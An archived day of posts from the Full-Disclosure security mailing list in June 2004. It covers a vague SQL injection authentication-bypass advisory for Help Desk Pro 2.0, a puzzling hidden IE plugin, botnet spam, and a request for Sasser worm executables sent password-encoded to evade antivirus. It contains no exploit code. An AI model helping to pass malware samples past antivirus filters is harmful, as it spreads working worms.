kyberdigi.cz/projects/execdir/english.html - 16k - 24 Jun 2004 - Cached -
Similar pages

----- Original Message -----
From: "Tim" <timabenath.de>
To: <full-disclosurelists.netsys.com>
Sent: Friday, June 25, 2004 8:05 PM
Subject: Re: [Full-Disclosure] flaw in php_exec_dir patch

> Hello List,
>
>> > Found a issue last night while testing php_exec_dir patch
>
> Where is this patch from? I was not able to locate it with an google
> search.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] "Sample" not running but preventing Win2k from Shutdown

From: Marcel Krause (marcel_kweb.de)
Date: Sat Jun 26 2004 - 03:58:14 CDT

Hi guys,

I was fishing for some nice MSIE "plugins" on some porn sites and
found a mysterious one. It does not appear anywhere, neither in my
Firewall nor as a toolbar, and there is no new process running on
the sandbox machine. But whenever I try to shut it down or reboot
it, an application called "sample" does not want to terminate
voluntarily. As said before, there is no such app in the process
list before shutting down, and there is no unknown sample*.* file
on any of the sandbox'es hard disks. Does anyone know this "sample"?

Yours,
Marcel

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

From: X iniT (x1n1tyahoo.com)
Date: Sat Jun 26 2004 - 04:55:20 CDT

The good folks at ClamAV took update
their Db very fast...

Your submission: 3822
Date: 09-06-2004 15:03:10 +0200
Original Filename: MSCDEX.EXE
Reported virus name: Unknown Virus/worm/trojan/spyware
Has been reviewed by: Tomasz Papszun

Submission added: Yes (as Worm.AntiQFX.A)
<<<<<<<<<<--CHECK IT OUT :)

The reviewer had the following note:
We are sorry for the delay!!
-------------

Thank you for taking time to submit samples. Your help
is very precious
to the ClamAV Users Community.

Best regards,
The VirusDB maintainers

                
__________________________________
Do you Yahoo!?
Yahoo! Mail - 50x more storage than other providers!
http://promotions.yahoo.com/new_mail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] ZH2004-13SA (security advisory): Sql Injection in Help Desp Pro 2.0

From: D'Amato Luigi (luigidamato77yahoo.it)
Date: Sat Jun 26 2004 - 05:59:08 CDT

26/06/2004

ZH2004-10SA (security advisory): Sql Injection in Help Desp Pro 2.0
Date of discovery : 1 Giugno 2004

Date of release 26 Giugno 2004

Nome: Help Desk Pro

Vulnerable Version: 2.0 non patchato

Vulnerability: Sql Injection

Autore: D'Amato Luigi from Zone-h Security Labs -
securitywirelesszone-h.it - adminsecuritywireless.info

Vendor: http://www.websoft.it/

Description

**********
Zone-H Security Team has discovered a flaw of securityin Help Desk Pro. This
vulnerability could allow malicious
attackers to bypass the authentication mechanish without having an account

Detail
********************************************
Due to an improper login validation in the login page it is possible to
bypass the authentication mechanism

Solution
**********
The vendor have been contact and have release a patch

---

D'Amato Luigi from Zone-h Security Labs -
securitywirelesszone-h.it -
adminsecuritywireless.info
Admin Security Wireless
http://www.securitywireless.info

http://www.zone-h.org/en/advisories/read/id=4891/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] defamatory joe job attack by botnet

From: lsi (stuartcyberdelix.net)
Date: Sat Jun 26 2004 - 06:34:25 CDT

On 26 Jun 2004 at 11:51, Aditya, ALD [ Aditya Lalit Deshmukh ] wrote:

> > I can also confirm that this is continuing from one of my many email adresses also.
>
> so now we know that not only the spammers are slime and are the people who do "organised crime" but they are rasists

> i know this has nothing to do with security so please send mail on my personal address and *NOT* to the list

One of the reasons I posted was because although the spam is not a
vulnerability in itself, it is evidence which leads back to folks who
have done a lot of damage (see: Sobig) -- and who knows what else.

It has to do with security because we're getting a better picture of
what these people look like.

For instance, it also appears they are German, or Dutch, or they have
German or Dutch connections. And they might even live in a Turkish
area. Etc ...

Some people mailed me and said this is happening all the time to
everyone - I can't correlate that as I only saw a few bounces from
one ISP. An automated and/or large-scale joe-job makes a mess. I'm
not seeing constant traffic like this, so I conclude its not occuring
constantly. Maybe one address gets used to spam a range of
addresses on one ISP. This would keep the bounces down (fits the
observed circumstances of just a few bounces) ... and would suggest
the purpose is to spread the hatemail, not defame the spoofed sender
(switching addresses would mean the mail comes from someone else,
diluting any defamatory effect).

I got two bounces. The original recipients were louisedircon.co.uk
and nicoladircon.co.uk (my original message shows netscalibur, who
are apparently providing some kind of backend service for dircon).

Note alphabetic proximity of recipients.. L and N

The bot was going through a list ..... but as that's all the bounces
I saw, I conclude addresses other than my own were used to spam the
rest of the alphabet, and other ISPs.

So that's a lot of people who have had their names associated with
that stuff. Spamming might be a crime in some countries, but
tarnishing the names of others is almost certainly a crime in all
countries. When they finally get arrested it will be 200 million
counts of spamming, and also, 50000 counts of defamation (or whatever
crime it actually is..) ... pesky automated solutions!

RISK: When you program a robot to commit a crime, you are asking for
trouble.

Stuart

---
Stuart Udall
stuart atcyberdelix.dot net - http://www.cyberdelix.net/

---
 * Origin: lsi: revolution through evolution (192.168.0.2)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] ZH2004-13SA (security advisory): Sql Injection in Help Desp Pro 2.0 (Corrected version)

From: D'Amato Luigi (adminsecuritywireless.info)
Date: Sat Jun 26 2004 - 06:35:27 CDT

06/26/2004
 
26/06/2004

ZH2004-10SA (security advisory): Sql Injection in Help Desp Pro 2.0
Discovered: June 1st 2004

Vendor contacted: June 1st 2004
Published: June 26th 2004

Title: Help Desk Pro

Vulnerable versions :2.0 unpatched

Type: Sql Injection

Author: D'Amato Luigi from Zone-h Security Labs - securitywirelesszone-h.it - adminsecuritywireless.info

Vendor: http://www.websoft.it/

Description

**********
Zone-H Security Team has discovered a flaw in Securityin Help Desk Pro. This vulnerability could allow malicious
attackers to bypass the authentication mechanish without having an account

Detail

********************************************

Due to an improper login validation in the login page it is possible to bypass the authentication mechanism

Solution

**********

The vendor has been contacted and has released a patch

---

D'Amato Luigi from Zone-h Security Labs -
securitywirelesszone-h.it -
adminsecuritywireless.info
Admin Security Wireless
http://www.securitywireless.info
 
http://www.zone-h.org/en/advisories/read/id=4891/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Microsoft and Security

From: Georgi Guninski (guninskiguninski.com)
Date: Sat Jun 26 2004 - 08:27:48 CDT

On Fri, Jun 25, 2004 at 03:38:56PM -0600, Burnes, James wrote:
> One word,
>
> m-o-n-o-p-o-l-y
>
> And what are you going to do about it, punk?
>

please don't underestimate the power of punks.
 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] "Sample" not running but preventing Win2k fromShutdown

From: Marcel Krause (marcel_kweb.de)
Date: Sat Jun 26 2004 - 08:23:12 CDT

Hi Steve!

> So what are you doing right now, killing the process via the Task
> Manager?

No. I booted linux and made a backup of the hdd. no I'm waiting for
some tips about how to extract the sample program for later analysis.
If noone has any ideas, i'll overwrite it with a clean image.

> Hmmm I am glad I am not in a commercial environment
> where I am forced to use MSIE.

In a commercial environment, you wouldn't go "fishing for [...]
plugins on some porn sites", would you?

Yours, Marcel

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] multiple scanning engines

From: RandallM (randallmfidmail.com)
Date: Sat Jun 26 2004 - 10:26:41 CDT

Hi,

I looking for something that can utilize multiple scanning engines to place
above our mail servers. Any suggestions?

 

thank you

Randall M

 

 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Wanted: Sasser executable and derivatives

From: The Central Scroutinizer (scroutinizerbeeb.net)
Date: Sat Jun 26 2004 - 11:50:00 CDT

Hi again,

Would you please send any executables direct to me, zipped and encoded with a password in order to get through my e-mail anti virus software,

Many thanks

CS

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Wanted: Sasser executable and derivatives

From: The Central Scroutinizer (scroutinizerbeeb.net)
Date: Sat Jun 26 2004 - 11:40:03 CDT

Hi,

I am intending on studying Sasser and its derivatives and am after executables in order to disassemble and reconstruct back to source.

As I say this is for study purposes only :)

I am looking for :-
    avserve.exe - Sasser.A
    avserve2.exe - Sasser.B + plus any xxx_up.exe files
    Sasser.C executable
    skynetave.exe - Sasser.D
    lsasss.exe - Sasser.E
    napatch.exe - Sasser.F
    Sasser.G executable

Either the compacted executables or decompacted or both.

Many thanks in advance,

The Central Scroutinizer

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] "Sample" not running but preventing Win2k from Shutdown

From: transientimages (roottransientimages.com)
Date: Sat Jun 26 2004 - 16:14:39 CDT

I can state "Me Two" on this :

Troubleshooting \ Analysis
--------------------------
pids, tlist, pulist do not show this name as an executed process, but when I
go to shutdown, the "Sample" process needs to be terminated before shutdown

Scans
-----
NAV and Ad-Aware report nothing
Secondary scanning with Trend Housecall
Netstat -ao reports nothing bad or remote
Blackice reports nothing going out

Running
        WinXP SP1
        MS Updates [Shavlik \ MS04-xxx patched]
        NAV 2003 Current Sigs
        Ad Aware Latest Sigs
        Blackice 3.6 cci

Weird : suspect a 0day IE exploit on one of the more dodgy security sites I
visit....

Anyone else?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Marcel Krause
Sent: Saturday, June 26, 2004 4:58 AM
To: Full Disclosure
Subject: [Full-Disclosure] "Sample" not running but preventing Win2k from
Shutdown

Hi guys,

I was fishing for some nice MSIE "plugins" on some porn sites and
found a mysterious one. It does not appear anywhere, neither in my
Firewall nor as a toolbar, and there is no new process running on
the sandbox machine. But whenever I try to shut it down or reboot
it, an application called "sample" does not want to terminate
voluntarily. As said before, there is no such app in the process
list before shutting down, and there is no unknown sample*.* file
on any of the sandbox'es hard disks. Does anyone know this "sample"?

Yours,
Marcel

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] "Sample" not running but preventing Win2k from Shutdown

From: Nick FitzGerald (nickvirus-l.demon.co.uk)
Date: Sat Jun 26 2004 - 18:29:38 CDT

Marcel Krause <marcel_kweb.de> wrote:

> I was fishing for some nice MSIE "plugins" on some porn sites and
> found a mysterious one. It does not appear anywhere, neither in my
> Firewall nor as a toolbar, and there is no new process running on
> the sandbox machine. But whenever I try to shut it down or reboot
> it, an application called "sample" does not want to terminate
> voluntarily. As said before, there is no such app in the process
> list before shutting down, and there is no unknown sample*.* file
> on any of the sandbox'es hard disks. ...

Jeeeez...

The lameness exhibited here just keeps getting more and more
unbelievable.

What in the world possessed you to "go fishing" for something that you
are clearly entirely inadequate to handle? How you could even consider
doing this without, obviously, the most basic grasp of modern malware
techniques is astounding.

Have you not heard of process injection?

Or even "browser helper objects"?

And that you would try this on a machine that is clearly not suitably
prepared for file system, registry and process "diff analysis" is only
more astounding than that you are gormless enough to admit to all those
inadequacies by posting about it here...

> ... Does anyone know this "sample"?

Not necessarily that specific one, but it is almost certainly very like
many others that have been using process injection techniques or the
BHO method of "injecting" themselves into Explorer...

If you tell us the URL you got it from someone who can spell "clue" may
spend two minutes working it out for you though...

Regards,

Nick FitzGerald

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] multiple scanning engines

From: Nick FitzGerald (nickvirus-l.demon.co.uk)
Date: Sat Jun 26 2004 - 18:29:38 CDT

"RandallM" <randallmfidmail.com> wrote:

> I looking for something that can utilize multiple scanning engines to
> place above our mail servers. Any suggestions?

Precisely how is this a security vulnerability disclosure issue?

Securityfocus has a focus-virus list and there are many other fora
around the web for discussing "whose antivirus is best" type issues...

Please, no-one else reply to this _on list_.

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] "Sample" not running but preventing Win2k from Shutdown

From: Aditya, ALD [ Aditya Lalit Deshmukh ] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sat Jun 26 2004 - 20:09:08 CDT

> I was fishing for some nice MSIE "plugins" on some porn sites and
> found a mysterious one. It does not appear anywhere, neither in my
> Firewall nor as a toolbar, and there is no new process running on
> the sandbox machine. But whenever I try to shut it down or reboot
> it, an application called "sample" does not want to terminate
> voluntarily. As said before, there is no such app in the process
> list before shutting down, and there is no unknown sample*.* file
> on any of the sandbox'es hard disks. Does anyone know this "sample"?

in win2k there an api which makes the process invisible. can you get the the exact plugin that is causing this. internet explorer has some browser objects that have access to all the to what ever IE has and there might be no visible tool bar ie it might be 1X1 pixels big. so you see nothing and there is no listed process as it is a partof internet explorer. is IE running all the time ?

it also might be a out of process com server creeated by ie that reefuses to shut down.

the sample*.* does not exist because it might be sprawned by some other process and clenaed up on execution or the sample might be the "window title" param and not the file name. please get a program that maps the programs that are running to file names on disk and that should be able to get what is going on ....

-aditya
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
éb½êÞvë"ž axZÞx÷«²‰Ú”Gb¶*'¡óŠ[kj¯ðÃæj)m­ªÿr‰ÿ

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] IE exploit runs code from graphics?

From: Jimmy Mitchener (packetmastergmail.com)
Date: Sat Jun 26 2004 - 21:12:36 CDT

On Sat, 26 Jun 2004 11:52:08 +0530, Aditya, ALD [ Aditya Lalit
Deshmukh ] <aditya.deshmukhonline.gateway.technolabs.net> wrote:
>
> > files (.CHM) from some web site, causing the HTML code inside the .CHM
> > to be run in the "My Computer" security zone. Typically (like all but
> > one of _dozens and dozens_ of these I've seen) the "inner" HTML run
>
> this is one of the _dozens and dozens_ reasons to use mozilla on untrusted sites and use ie to access internal websites if they do depend of some ie features but set the default browser to mozilla so that when ever the user cliks something it opens in mozilla

Why would you assume Mozilla is any less vulnerable? Perhaps not
publicly, it is simply not as large of a target as IE. You should
really not be browsing on an "important" system no matter what. Unless
perhaps you have systrace or SELinux guarding it (which even then is
not 100%).

Jimmy.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] RE: Text message

From: Shaunige (shaunigeyahoo.co.uk)
Date: Sat Jun 26 2004 - 23:49:47 CDT